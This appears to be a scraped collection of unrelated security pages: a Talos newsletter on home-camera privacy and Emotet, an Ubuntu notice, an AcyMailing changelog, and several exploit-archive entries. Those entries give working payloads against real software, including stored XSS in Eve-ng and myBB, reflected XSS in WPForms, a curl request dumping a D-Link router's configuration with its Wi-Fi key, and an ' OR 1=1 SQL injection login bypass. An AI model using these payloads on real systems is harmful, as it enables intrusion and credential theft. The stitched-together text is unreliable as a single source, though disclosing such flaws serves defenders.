Very few of us looking to buy these pieces of equipment are qualified to say if these products are even secure, and those among us who are are probably smart enough to know not to buy these products in the first place.

Thursday, March 30, 2023 14:03

Welcome to this week’s edition of the Threat Source newsletter.

Everyone loves a good video of someone slipping on their icy steps in the winter, captured thanks to their home security camera or smart doorbell. But what about when that camera is just kind of chilling out and not catching the moment your dog takes off after that squirrel?

The world of security cameras and recording devices attached to one’s home is becoming increasingly murky by the day. Law enforcement officials are finding ways to compel the companies that manufacture and manage these devices to turn over homeowners’ footage, even if the homeowner doesn’t consent to it.

And Amazon Ring, the biggest player in this space now, may or may not be the target of a ransomware attack.

So, while consumers might be purchasing these devices to ensure their physical security, the question about if these products are good for online security is a major question mark.

As Talos’ own Joe Marshall wrote in a guest column at Dark Reading this week, “IoT vendors continue to fail us on implementing solid cybersecurity controls.” This even goes for some of the largest tech companies in the world who would conceivably have the most money to invest in securing and testing these devices before they hit the market.

There are tons of budget options on the market that, unless you are an expert vulnerability researcher, are impossible to fully vet. I just went to Amazon’s website this week and searched for “smart doorbell.” Three of the best-selling items on the first page of results use nearly the exact same thumbnail art to advertise the product. Yet when you go to their product pages, each one is listed as being manufactured or sold by a different company.

If you’re merely reading the reviews of these products to figure out what’s right for you, or searching the internet for someone else’s review, they may mention if the resolution quality is up to snuff or if the app works well, but I doubt the reviewer has the time to physically tear apart the device looking for vulnerabilities or combing through the API for security holes. And if we can’t even trust the companies making these devices to differentiate their products based on appearance, there is no way to know how they may be prepared to respond to a data breach or what their stance is on sharing footage with law enforcement.

The same goes for security cameras. On Amazon’s search page for “home security camera,” the top five non-sponsored results are all made by different companies (Ring being one of them) and based on the features they offer, it’s nearly impossible to differentiate them outside of a difference in form factor. Very few of us looking to buy these pieces of equipment are qualified to say if these products are even secure, and those among us who are are probably smart enough to know not to buy these products in the first place.

I certainly wouldn’t stop anyone from buying a home security camera if they truly feel it improves their families’ safety. But I think that, no matter what brand we buy, everyone just needs to assume now that they’re taking a risk with their privacy and online security as a trade-off for catching possible package burglars.

**The one big thing**

Emotet is back from the dead once again. Since returning, Emotet has leveraged several distinct infection chains, indicating that they are modifying their approach based on their perceived success in infecting new systems. The initial emails delivered to victims are consistent with what has been observed from Emotet over the past several years.

Why do I care?

Emotet is arguably the most infamous botnet on the threat landscape, so it’s notable any time it spins back up. This network is known to go through quiet periods and then pop back up, so this isn’t particularly surprising, but it is noteworthy because Emotet’s creators are switching up their tactics by switching to new types of lure documents to evade detection and recent changes Microsoft made to macros to try and stop attackers from using malicious Office attachments.

**So now what?**

Because Emotet has been around for so long now, Cisco Secure and Talos have an exhaustive list of ways to stay protected from Emotet spam. But as a good general reminder, always make sure you triple-check the “From” field in an email to make sure it’s actually from who you think its from. And never open an attachment or click on a link in an email unless you’re sure it’s the correct destination.

**Top security headlines of the week**

**Defenders and detractors of TikTok both seem unmoved** after the popular social media app’s CEO testified in front of a U.S. Congressional panel last week. Lawmakers who are in favor of a blanket ban on the app in the U.S. over data and privacy concerns were unimpressed with the answers the company’s lead provided, while others mocked lawmakers for the types of questions they asked and instead advocated for broader data privacy laws. Republicans in Congress still plan to take up legislation to ban TikTok, with House Speaker Kevin McCarthy tweeting that, “It’s very concerning that the CEO of TikTok can’t be honest and admit what we already know to be true — China has access to TikTok user data.” (Buzzfeed, The Hill, The New Yorker)

**A bug in the popular ChatGPT AI tool exposed other users’ message history** and may have also leaked sensitive information like the payment information and emails of premium users. OpenAI, the company behind ChatGPT, took the tool offline last Tuesday for emergency maintenance after they became aware of the issue. The company confirmed the information was exposed during a nine-hour window on March 20, but it could have been exposed prior to that. The data leak exposes concerns that many users have around using tools like ChatGPT to share sensitive or potentially confidential information. (SecurityWeek, Engadget)

**A data breach at Latitude Financial affects millions of people in New Zealand and Australia,** potentially dating back to 2005. The personal lending company said attackers stole around 7.9 million driver’s license numbers and 53,000 passport numbers. Names, addresses, phone numbers and dates of birth are also among the data stolen. When Latitude first announced the attack on March 16, it estimated that 300,000 customers had been affected, but the number has grown as the investigation continued, though the company stopped the breach prior to the disclosure. The breach has called into question why financial companies retain records for so long after a customer has applied for financing and how that data is stored. (The Guardian, Yahoo Finance)

**Can’t get enough Talos?**

*   Talos Takes Ep. #132: Reflecting on one year of Talos' work in Ukraine
*   Graphic novel: Life inside the Talos Ukraine Task Unit
*   How an incident response retainer can drive proactive security
*   Threat Roundup for March 17 - 24
*   If your Netgear Orbi router isn’t patched, you’ll want to change that pronto

**Upcoming events where you can find Talos**

**RSA** **(April 24 - 27)**

San Francisco, CA

**Cisco Live U.S.** **(June 4 - 8)**

Las Vegas, NV

**Most prevalent malware files from Talos telemetry over the past week**

  
**SHA 256:** e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
**MD5:** 93fefc3e88ffb78abb36365fa5cf857c  
**Typical Filename:** Wextract  
**Claimed Product:** Internet Explorer  
**Detection Name:** PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

**SHA 256:** de3908adc431d1e66656199063acbb83f2b2bfc4d21f02076fe381bb97afc423  
**MD5:** 954a5fc664c23a7a97e09850accdfe8e  
**Typical Filename:** teams15.exe  
**Claimed Product:** teams15  
**Detection Name:** Gen:Variant.MSILHeracles.59885

**SHA 256:** c74e7421f2021b46ee256e5f02d94c1bce15da107c8c997c611055412de1ac1  
**MD5:** 2d16d0af6183803a79d9ef5c744286c4  
**Typical Filename:** nano\_download.php  
**Claimed Product:** Web Companion Installer  
**Detection Name:** W32.1C74E7421F-100.SBX.VIOC

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

Threat Source newsletter (March 30, 2023) — It’s impossible to tell if your home security camera or doorbell is truly safe

Eve-ng version 5.0.1-13 suffers from a cross site scripting vulnerability.

    # Exploit Title: Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) # Google Dork: N/A# Date: 12/6/2022# Exploit Author: @casp3r0x0 hassan ali al-khafaji# Vendor Homepage: https://www.eve-ng.net/# Software Link: https://www.eve-ng.net/index.php/download/# Version: Free EVE Community Edition Version 5.0.1-13# Tested on: Free EVE Community Edition Version 5.0.1-13# CVE : N/A#we could achieve stored XSS on eve-ng free I don't know If thiseffect pro version also#first create a new lab#second create a Text label#insert the xss payload and click save "><script>alert(1)</script>#the application is multi user if any user open the lab the xss will be triggered.

Eve-ng 5.0.1-13 Cross Site Scripting

WordPress WPForms plugin version 1.7.8 suffers from a cross site scripting vulnerability.

Change Mirror Download

    # Exploit Title: WPForms 1.7.8 - Cross-Site Scripting (XSS)# Date: 2022-12-05# Author: Milad karimi# Software Link: https://wordpress.org/plugins/wpforms-lite# Version: 1.7.8# Tested on: Windows 10# CVE: N/A1. Description:This plugin creates a WPForms from any post types. The slider import search feature and tab parameter via plugin settings are vulnerable to reflected cross-site scripting.2. Proof of Concept:https://$target/ListTable.php?foobar=<script>alert("Ex3ptionaL")</script>

WordPress WPForms 1.7.8 Cross Site Scripting

DSL-124 Wireless N300 ADSL2+ suffers from a backup disclosure vulnerability.

    # Exploit Title: DSL-124 Wireless N300 ADSL2+ - Backup File Disclosure# Date:  2022-11-10# Exploit Author: Aryan Chehreghani# Vendor Homepage: https://www.dlink.com# Software Link: https://dlinkmea.com/index.php/product/details?det=dU1iNFc4cWRsdUpjWEpETFlSeFlZdz09# Firmware Version: ME_1.00# Tested on: Windows 11# [ Details - DSL-124 ]:#The DSL-124 Wireless N300 ADSL2+ Modem Router is a versatile, high-performance router for a home or small office,#With integrated ADSL2/2+, supporting download speeds up to 24 Mbps, firewall protection,#Quality of Service (QoS),802.11n wireless LAN, and four Ethernet switch ports,#the Wireless N300 ADSL2+ Modem Router provides all the functions that a user needs to establish a secure and high-speed link to the Internet.# [ Description ]:#After the administrator enters and a new session is created, the attacker sends a request using the post method in her system,#and in response to sending this request, she receives a complete backup of the router settings,#In fact this happens because of the lack of management of users and sessions in the network.# [ POC ]:Request :curl -d "submit.htm?saveconf.htm=Back+Settings" -X POST http://192.168.1.1/form2saveConf.cgiResponse :HTTP/1.1 200 OKConnection: closeServer: Virtual Web 0.9Content-Type: application/octet-stream;Content-Disposition: attachment;filename="config.img"Pragma: no-cacheCache-Control: no-cache<Config_Information_File_8671><V N="WLAN_WPA_PSK" V="pass@12345"/><V N="WLAN_WPA_PSK_FORMAT" V="0x0"/><V N="WLAN_WPA_REKEY_TIME" V=""/><V N="WLAN_ENABLE_1X" V="0x0"/><V N="WLAN_ENABLE_MAC_AUTH" V="0x0"/><V N="WLAN_RS_IP" V="0.0.0.0"/>...</Config_Information_File_8671>

DSL-124 Wireless N300 ADSL2+ Backup Disclosure

Ubuntu Security Notice 5983-1 - Cyku Hong discovered that Nette was not properly handling and validating data used for code generation. A remote attacker could possibly use this issue to execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5983-1  
March 29, 2023

php-nette vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS  
- Ubuntu 16.04 ESM

Summary:

Nette could be made to run programs if it received specially crafted  
network traffic.

Software Description:  
- php-nette: Nette Framework

Details:

Cyku Hong discovered that Nette was not properly handling and validating  
data used for code generation. A remote attacker could possibly use this  
issue to execute arbitrary code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   php-nette                       2.4-20160731-1ubuntu0.1

Ubuntu 16.04 ESM:  
   php-nette                       2.3.8-1ubuntu1+esm1

After a standard system update you need to restart any applications using  
Nette to make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5983-1  
   CVE-2020-15227

Package Information:  
https://launchpad.net/ubuntu/+source/php-nette/2.4-20160731-1ubuntu0.1

Ubuntu Security Notice USN-5983-1

myBB forums version 1.8.26 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS)   
# Exploit Author: Andrey Stoykov  
# Software Link: https://mybb.com/versions/1.8.26/  
# Version: 1.8.26  
# Tested on: Ubuntu 20.04

Stored XSS #1:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Templates and Style" -> "Templates" -> "Manage Templates" -> =  
"Global Templates"=20  
3. Select "Add New Template" and enter payload "><img src=3Dx onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dstyle-templates&action=3Dedit_temp=  
late HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&sid=3D-1&template=3D&continue=3DSave+and+Continue+Editing

// HTTP redirect response to specific template

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
Location: index.php?module=3Dstyle-templates&action=3Dedit_template&title=  
=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&sid=3D-1  
[...]

// HTTP GET request to newly created template

GET /mybb_1826/admin/index.php?module=3Dstyle-templates&sid=3D-1 HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
X-Powered-By: PHP/5.6.40  
[...]

<tr class=3D"first">  
<td class=3D"first"><a href=3D"index.php?module=3Dstyle-templates&actio=  
n=3Dedit_template&title=3D%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3=  
E&sid=3D-1">"><img src=3Dx onerror=3Dalert(1)></a></td>  
[...]

Stored XSS #2:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Management"  
3. Select "Add New Forum" and enter payload "><script>alert(1)</script>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-management&action=3Dadd HTTP=  
/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&type=3Df&title=3D"><script>a=  
lert(1)</script>&description=3D"><script>alert(2)</script[...]

// HTTP response showing successfully added a new forum

HTTP/1.1 200 OK  
Date: Sun, 20 Nov 2022 11:00:28 GMT  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forums

GET /mybb_1826/admin/index.php?module=3Dforum-management HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<small>Sub Forums:  <a href=3D"index.php?module=3Dforum-management&fid=  
=3D3">"><script>alert(1)</script></a></small>

Stored XSS #3:

To reproduce do the following:

1. Login as administrator user  
2. Browse to "Forums and Posts" -> "Forum Announcements"  
3. Select "Add Announcement" and enter payload "><img+src=3Dx+onerror=3Dale=  
rt(1)>

// HTTP POST request showing XSS payload

POST /mybb_1826/admin/index.php?module=3Dforum-announcements&action=3Dadd H=  
TTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

my_post_key=3D60dcf2a0bf3090dbd2c33cd18733dc4c&title=3D"><img+src=3Dx+onerr=  
or=3Dalert(1)>&starttime_day=3D20&starttime_month=3D11&starttime_year=3D202=  
2&starttime_time=3D11:05+AM&endtime_day=3D20&endtime_month=3D11&endtime_yea=  
r=3D2023&endtime_time=3D11:05+AM&endtime_type=3D2&message=3D"><script>alert=  
(2)</script>&fid=3D2&allowmycode=3D1&allowsmilies=3D1

// HTTP response showing successfully added an anouncement

HTTP/1.1 302 Found  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

// HTTP GET request to fetch forum URL

GET /mybb_1826/ HTTP/1.1  
Host: 192.168.139.132  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:106.0) Gecko/20100=  
101 Firefox/106.0  
[...]

// HTTP response showing unsanitized XSS payload

HTTP/1.1 200 OK  
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev P=  
erl/v5.16.3  
[...]

<a href=3D"forumdisplay.php?fid=3D3" title=3D"">"><script>alert(1)</script>=  
</a>

--sgnirk-590ebdc0-1da1-4f35-a731-39a2519b1c0d--

myBB forums 1.8.26 Cross Site Scripting

Helmet Store Showroom version 1.0 suffers from a remote SQL injection vulnerability that allows for login bypass.

    # Exploit Title: Helmet Store Showroom v1.0 - SQL Injection# Exploit Author: Ameer Hamza# Date: November 15, 2022# Vendor Homepage: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=15851&title=Helmet+Store+Showroom+Site+in+PHP+and+MySQL+Free+Source+Code# Tested on: Kali Linux, Apache, Mysql# Vendor: oretnom23# Version: v1.0# Exploit Description:# Helmet Store Showroom v1.0 suffers from SQL injection on the login page which leads to authentication bypass of the admin account.[+] The username parameter is vulnerable to SQLi in login page[+] URL --> http://localhost/hss/admin/login.php[+] Username = ' OR 1=1-- -HTTP REQUESTPOST /hss/classes/Login.php?f=login HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 38Origin: http://localhostConnection: closeReferer: http://localhost/hss/admin/login.phpCookie: PHPSESSID=08o3sl7jk4l442gq19s1t3hvpausername='+OR+1%3D1+--+-&password=1234

Helmet Store Showroom 1.0 SQL Injection

AnyMailing Joomla Plugin is vulnerable to stored cross site scripting (XSS) in templates and emails of AcyMailing, exploitable without authentication when access is granted to the campaign's creation on front-office. This issue affects AnyMailing Joomla Plugin Enterprise in versions below 8.3.0.

*   **AcyMailing 5.10.18**
    
    December 10, 2020
    
    **Improvements & fixes**
    
*   **AcyMailing 6.19.3**
    
    December 18, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.19.2**
    
    December 10, 2020
    
    **Improvements**
    
    *   New button to be redirected on the wordpress support of AcyMailing
    
    **Bug fixes**
    
*   **AcyMailing 6.19.1**
    
    December 9, 2020
    
    **Bug fixes**
    
*   **AcyMailing 5.10.17**
    
    December 2, 2020
    
    **Improvements & fixes**
    
*   **AcyMailing 6.19.0**
    
    December 1, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.18.2**
    
    November 12, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.18.0**
    
    November 9, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.17.1**
    
    October 28, 2020
    
    **Bug fixes**
    
    *   Fixed date for scheduled campaign showing with the timezone
    
*   **AcyMailing 6.17.0**
    
    October 19, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 5.10.16**
    
    October 15, 2020
    
    **Features**
    
    *   A new plugin lets you restrict the available fields when importing users from the front-end
    
    **Improvements & fixes**
    
*   **AcyMailing 6.16.4**
    
    October 8, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.3**
    
    October 7, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.2**
    
    October 1, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.16.1**
    
    September 29, 2020
    
    **Bug fixes**
    
    *   Hide php warning from other plugins
    
*   **AcyMailing 6.16.0**
    
    September 28, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.15.1**
    
    Septempber 9, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.15.0**
    
    September 7, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.14.1**
    
    August 19, 2020
    
    **Improvements**
    
    *   Remove check version in the starter version
    
    **Bug fixes**
    
*   **AcyMailing 6.14.0**
    
    August 17, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 5.10.15**
    
    August 7, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.13.3**
    
    August 3, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.2**
    
    July 30, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.1**
    
    July 29, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.13.0**
    
    July 27, 2020
    
    **New features**
    
    *   New design and UX for listing toolbar
    *   Added the possibility to create a list on the import in the list selection modal
    *   Added settings for the following add-ons: article, DOCman, DPcalendar, Easyblog, Easyprofile, EventBooking, FlexiContent, Hikashop, ICagenda, JDownloads, JEvent, K2, RSEventPro, RSS, Seblod, Virtumart
    *   Added settings for the following add-ons: post, page, RSS, The Event Calendar, Woocommerce
    *   New Giphy integration in the drag and drop editor
    *   Added the possibility to create custom view for each add-on to override the content inserted in the drag and drop editor
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.12.1**
    
    July 27, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.12.0**
    
    July 6, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.11.1**
    
    June 17, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.11.0**
    
    June 15, 2020
    
    **New features****Improvements**
    
    *   You can now add a message at the beginning of emails sent as tests
    *   Better display for the dynamic content insertion options (insertion of site articles in an email for example)
    *   The emails listing has been re-made: the "Campaigns" menu is renamed into "Emails" and the listing show four types of email
    *   The user listing has been improved, the data is displayed in a better way, and you can filter users by subscription
    *   The email creation has been improved, you can now pre-select the type of email you want to create (campaign / auto / scheduled / welcome / unsubscribe)
    *   You can now Unsubscribe / re-subscribe for all the lists at a time in the user edition page
    *   The bounce rule creation page has been improved and a presentation of the bounce handling feature has been added
    *   New export button on the lists listing to export subscribers
    *   The custom fields edition page has been redesigned and simplified
    *   The lists listing page has been improved and more information has been added
    *   New description field for lists, it will be added on the profile page as a tooltip in a future release
    *   The user "Source" is now easier to understand
    *   Cancel buttons added in various locations (import / export / mail edition...)
    *   New full translation in Japanese, Lithuanian, Spanish
    *   More translations in Catalan, Czech, Dutch, German, German (Switzerland), Norwegian (Bokmål), Polish, Romanian, Slovenian, Swedish
    
    **Bug fixes**
    
*   **AcyMailing 6.10.4**
    
    May 13, 2020
    
    **Improvements**
    
    *   PHP 7.4 compatibility
    *   Much easier way to attach a site with a license in the configuration
    *   The length of the "Email preview line" option is now limited to 255 characters
    *   The "Every week on Monday, Friday" trigger now takes the site's timezone into account in automations and periodic campaigns
    *   New security added on the custom fields names and unique code generation
    *   Better custom fields migration from the v5
    *   The shared servers email addresses are now handled in the bounce handling
    *   A new "revealonline" CSS class is now available, to hide something in the receiver's mailbox and show it on the online version
    *   New full Serbian translation
    *   Translation update and corrections for Danish, German, Finnish, French, Norwegian, Romanian, Russian, Slovenian, Swedish, Turkish and Ukrainian
    
    **Bug fixes**
    
*   **AcyMailing 5.10.14**
    
    May 13, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.10.2**
    
    April 21, 2020
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.10.1**
    
    April 7, 2020
    
    **Bug fixes**
    
*   **AcyMailing 6.10.0**
    
    April 6, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.9.2**
    
    March 23, 2020
    
    Vulnerability on file upload fixed when having admin access to AcyMailing pages. Any wrong file uploaded will be cleaned during the update process.  
    We strongly recommend to update AcyMailing as soon as possible, more information will be added in the related CVE
    
    **Bug fixes**
    
*   **AcyMailing 6.9**
    
    March 9, 2020
    
    **Improvements**
    
    *   The user import choices are now stored
    *   Greatly improved performances on the click tracking system, emails should be sent much faster
    *   Added the "hideonline" CSS class on emails. When added on an element, it will be hidden on the archive and "View it online" link
    *   Added the click statistics on the campaigns listing
    *   The detailed statistics are now no longer ordered randomly if the sending date is the same for every user
    *   You can now search multiple words in the dropdown fields (like the mail selection dropdown in the statistics page)
    *   Improved the "Check database integrity" feature to clean data from some AcyMailing tables, and translate result
    *   Improved the way custom fields are displayed when inserted in an email, for dropdown, radio and checkbox fields
    *   The welcome email is now not sent when the user isn’t active
    *   Better display for the "Send settings" step of campaigns
    *   Queued emails are now automatically removed for inactive users two days after the sending date
    *   \[addon\] New add-on for ICagenda, event insertion and user filter by event subscription
    *   \[addon\] Added compatibility with HikaShop 4
    *   Added multi-language compatibility when inserting articles in emails (for the link applied on the title)
    *   Tracked links are not processed by the sef system anymore, for special sef extension compatibility
    *   Improved the router for a better compatibility with the Joomla sef system on unsubscribe and online links, for multi-language sites
    *   AcyMailing will now instantly know it when you attached your website to your license when trying to update in WordPress
    *   A better url is used for the "Terms and conditions" post
    *   Code adaptation for WordPress standards
    *   Added compatibility with the plugin Schema and structured data for wp
    *   More translations for Chinese, Norwegian, Romanian, Slovenian
    *   Full Swedish translation
    
    **Bug fixes**
    
*   **AcyMailing 5.10.13**
    
    March 3, 2020
    
    **Modifications**
    
*   **AcyMailing 6.8**
    
    February 3, 2020
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.7**
    
    January 13, 2020
    
    **New features****Improvements**
    
    *   Editor: auto-hide the test zone if the email is successfully sent
    *   Editor: the title is now added on inserted images
    *   Editor: when inserting a separator, a new option lets you add some space below and above
    *   Editor: the drag & drop editor now opens in full screen mode
    *   Better interface for the "Test" step of the Campaign's edition page
    *   Improved the AcyMailing left menu when the window is resized
    *   Improved the AcyMailing header's display on small screens and tablets
    *   "Cancel" buttons have been added on multiple edition pages (List, user, bounce rule, custom field...)
    *   The add-ons are now ordered alphabetically for an easier search
    *   Improved performances on style and script loading for each AcyMailing page
    *   The FontAwesome library isn't loaded anymore, used fonts are now embed in AcyMailing to improve the page load speed
    *   New option in the mail configuration to disable automatic hyphens in paragraphs for sent emails
    *   New option to show the site's header on the unsubscribe page
    *   The "Bounce email address" option is now available in the free version in the "Mail settings" tab of the configuration
    *   In the bounce handling system, you can now connect to a mailbox using the "Pop3 without imap extension" method
    *   The "source" is automatically completed when a new AcyMailing user is created
    *   Automations: added a confirmation when deleting an email in the "Add an email in the queue" action
    *   Translation improvements: German, French, Hungarian, Norwegian, Russian, Turkish, Ukrainian
    *   New full translation: Slovenian
    
    **Bug fixes**
    
*   **AcyMailing 5.10.12**
    
    January 10, 2020
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.6.0**
    
    December 2, 2019
    
    **New features****Improvements**
    
    *   All the add-ons now have options for the automatic campaigns to automatically send the new content to your users
    *   Better alignment for Follow buttons in Outlook 2007 - 2010
    *   Better UX for the list's edition page
    *   The shown statistics numbers are now consistent in the campaigns listing and the statistics page
    *   In some mail clients, a 1px border may appear around your emails, this is no longer the case
    *   The mobile preview has been inproved, and no more double scrollbar
    *   The default templates have been remade to include this version's improvements
    *   The campaign's settings are now applied on the dynamic content inserted in your emails (like the site's articles/posts)
    *   Improved the campaigns edition page display and removed the hint popup
    *   Compatibility with the GDPR plugin
    *   The Add-ons menu is now translated in the Joomla menu
    *   The "Price text" field is now taken into account in the EventBooking add-on
    *   New partial translations, imported from AcyMailing 5: Arabic, Bosnian, Bulgarian, Catalan, Chinese, Croatian, Estonian, Finnish, Galician, Hebrew, Icelandic, Indonesian, Japanese, Latvian, Lithuanian, Macedonian, Persian, Serbian, Sindhi, Swahili, Thai, Urdu, Vietnamese, Welsh
    
    **Bug fixes**
    
*   **AcyMailing 5.10.11**
    
    November 27, 2019
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.5.0**
    
    November 5, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.4.0**
    
    October 14, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.3.1**
    
    September 25, 2019
    
    **Bug fixes**
    
*   **AcyMailing 6.3.0**
    
    September 23, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.2.2**
    
    August 30, 2019
    
    This is a patch release to address a security issue on the file upload custom field. We highly recommend to update to the v6.2.2 as soon as possible for websites matching all of the following conditions:
    
    *   The Enterprise edition of AcyMailing is used
    *   The version 6.2.0 or 6.2.1 is used
    *   A "File" custom field is created and visible for the users in a front-end subscription form (the module on Joomla or the widget on WordPress)
    *   An other custom field other than a "File" field must be displayed on the form, in addition to the "Name", "Email" and "File" fields
    
    If your website doesn't match one of these conditions it is not concerned by the security issue, but we still recommend you to keep AcyMailing updated when a new version is available.
    
*   **AcyMailing 5.10.10**
    
    August 28, 2019
    
    **Improvements and bug fixes**
    
*   **AcyMailing 6.2.1**
    
    August 27, 2019
    
    **Improvements and bug fixes**
    
*   **AcyMailing 6.2.0**
    
    August 20, 2019
    
    **New features and improvements****Bug fixes**
    
*   **AcyMailing 6.1.10**
    
    August 5, 2019
    
    **Bug fixes**
    
*   **AcyMailing 5.10.9**
    
    July 31, 2019
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 6.1.9**
    
    July 30, 2019
    
    **New features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.8**
    
    July 15, 2019
    
    There aren't much modifications in this version, but it had to be released as the "Send settings" step of the campaigns edition workflow could be blocked in some cases when scheduling the campaign, saving as draft then returning on this step.
    
    **Modifications**
    
*   **AcyMailing 6.1.7**
    
    July 8, 2019
    
    **Improvements****Bug fixes****Integrations**
    
*   **AcyMailing 6.1.6**
    
    June 18, 2019
    
    This version is mainly an improvements and maintenance release, mainly focusing on the editor and sent emails.
    
    **Improvements****Bug fixes**
    
*   **AcyMailing 5.10.8**
    
    June 18, 2019
    
    **Improvements****Bug fixes****Plugins**
    
*   **AcyMailing 6.1.5**
    
    June 3, 2019
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.4**
    
    April 23, 2019
    
    **Features****Improvements****Bug fixes**
    
*   **AcyMailing 6.1.3**
    
    April 2, 2019
    
*   **AcyMailing 5.10.7**
    
    March 25, 2019
    
*   **AcyMailing 5.10.6**
    
    March 18, 2019
    
*   **AcyMailing 6.1.2**
    
    March 11, 2019
    
*   **AcyMailing 6.1.1**
    
    February 13, 2019
    
*   **AcyMailing 6.0.4**
    
    February 6, 2019
    
*   **AcyMailing 5.10.5**
    
    January 10, 2019
    
*   **AcyMailing 6.0.3**
    
    January 9, 2019
    
*   **AcyMailing 6.0.2**
    
    December 17, 2018
    
*   **AcyMailing 6.0.1**
    
    November 28, 2018
    
*   **AcyMailing 6 Beta**
    
    November 19, 2018
    
